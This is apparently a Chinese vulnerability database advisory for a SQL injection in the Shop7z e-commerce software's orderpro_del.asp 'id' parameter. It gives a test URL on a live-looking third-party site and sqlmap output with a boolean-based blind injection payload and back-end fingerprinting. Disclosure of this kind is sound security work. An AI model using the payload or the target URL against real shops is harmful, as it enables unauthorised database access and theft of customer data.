Shop7z /orderpro_del.asp id参数SQL注入漏洞

基本字段

漏洞编号:
SSV-90546
披露/发现时间:
未知
提交时间:
2016-01-20
漏洞等级:
漏洞类别:
SQL 注入
影响组件:
Shop7z
漏洞作者:
未知
提交者:
MyKings
CVE-ID:
补充
CNNVD-ID:
补充
CNVD-ID:
补充
ZoomEye Dork:
补充

来源

漏洞详情

贡献者 hhxx 共获得  0.75KB

0x01 框架概述

相关厂商: shop7z

公开时间: 2015-04-23

官方主页: http://www.shop7z.com/

Shop7z网上购物系统是国内优秀的网上开店软件,模板新颖独特,功能强大,可以快速建立自己的网上商城。

0x02 漏洞细节

漏洞文件:orderpro_del.asp

问题参数:id

TEST:http://www.125309.com/orderpro_del.asp?id=

sqlmap证明:

Place: GET

Parameter: id

    Type: boolean-based blind

    Title: Microsoft Access boolean-based blind - Parameter replace (original va

lue)

    Payload: id=IIF(2623=2623,1,1/0)

---

[19:50:23] [INFO] the back-end DBMS is Microsoft Access

web server operating system: Windows 2003

web application technology: ASP.NET, Microsoft IIS 6.0

back-end DBMS: Microsoft Access

[19:50:23] [INFO] fetched data logged to text files under 'D:\python\sqlmap\outp

ut\www.125309.com'



[*] shutting down at 19:50:23

0x03 参考链接

http://www.wooyun.org/bugs/wooyun-2010-0109753

xiaodingdang haitao2460 共 5  兑换了

PoC (pocsuite 插件) (pocsuite 插件)

贡献者 MyKings 共获得   0KB
登陆后兑换查看

共 0 兑换

参考链接

解决方案

临时解决方案

暂无临时解决方案

官方解决方案

暂无官方解决方案

防护方案

暂无防护方案

生命线

  • 发现/披露了漏洞
  • MyKings
    2016-01-20 提交了漏洞
  • MyKings
    2016-01-20 提交更新了 PoC
  • MyKings
    2016-01-28 提交补充了漏洞详情

相关漏洞

人气 1881
评论前需绑定手机 现在绑定

暂无评论

※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负

京ICP备10040895号 京公网安备 11010502034610号 Copyright @ 404 Team from Knownsec. English